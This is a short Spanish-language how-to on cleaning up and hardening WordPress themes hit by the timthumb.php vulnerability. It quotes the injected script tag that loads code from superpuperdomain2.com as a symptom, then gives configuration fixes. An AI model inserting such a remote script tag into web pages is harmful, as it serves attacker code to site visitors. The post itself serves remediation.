Vulnerabilidad en timthumb.php

Sintomas

Lo más probable es que cuando quieras entrar al sitio, tu antivirus, o tu navegador te avisen de que tu sitio esta cargando contenido de superpuperdomain2.com y éste es un sitio maligno. Sino, fijate el codigo fuente de tu web, y al final debes tener algo asi:

<script language=”javascript” SRC=”http://superpuperdomain2.com/count.php?ref=”>

¿Cómo solucionarlo?

Primero, el codigo malicioso, fue insertado en el index.php  de tu blog. Lo debes borrar de ahi.

En segundo lugar, corrige el problema para que no vuelva a suceder…  descarga la ultima version de timthum.php antes de reemplazarlo por el existente en tu theme, hazle los siguientes cambios:

Cambia define( ‘ALLOW_EXTERNAL’, TRUE);  por  define( ‘ALLOW_EXTERNAL’, false);

Y tambien cambia ésto:

$allowedSites = array ( ‘flickr.com’,
‘picasa.com’,
‘img.youtube.com’,
‘upload.wikimedia.org’,
);

Por ésto:

$allowedSites = array();

Para encontrar todos los timthumb.php que puedes tener, (uno por theme, aunque no todos lo usan) pudes hacer desde la consola:
find . | grep timthumb.php